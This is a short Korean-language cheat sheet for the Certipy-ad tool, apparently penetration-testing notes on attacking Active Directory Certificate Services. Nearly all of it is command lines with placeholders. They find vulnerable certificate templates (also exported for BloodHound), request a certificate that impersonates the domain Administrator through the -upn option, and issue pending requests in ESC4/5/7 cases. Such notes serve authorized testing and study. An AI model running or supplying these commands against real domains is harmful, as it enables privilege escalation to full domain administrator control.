Certipy-ad는 도메인 사용자 계정 정보를 사용하여 AD CS의 템플릿을 통해 인증서를 요청하는 도구입니다.
# 유효한 도메인 사용자 계정을 통해 취약한 템플릿 목록 확인
certipy-ad find -u <USER> -p <PASS> -dc-ip <dc-ip> -stdout -vulnerable -enabled -ns <dc-ip> -dns-tcp
# 유효한 도메인 사용자 계정을 통해 취약한 템플릿 목록 확인을 블러드하운드로 저장
certipy-ad find -u <USER> -p <PASS> -dc-ip <dc-ip> -stdout -vulnerable -enabled -ns <dc-ip> -dns-tcp -bloodhound
# 취약한 템플릿을 통한 인증서 발급 요청
certipy-ad req -u <USER> -p <PASS> -dc-ip <dc-ip> -target-ip <adcs-ip> -ca <CA> -template <Template> -upn Administrator -ns <dc-ip> -dns-tcp
# 요청된 인증서 발급 (ESC 4,5,7 경우에만)
certipy-ad ca -u <USER> -p <PASS> -dc-ip <dc-ip> -ns <dc-ip> -target-ip <adcs-ip> -ca <CA> -issue-request <num> -dns-tcp
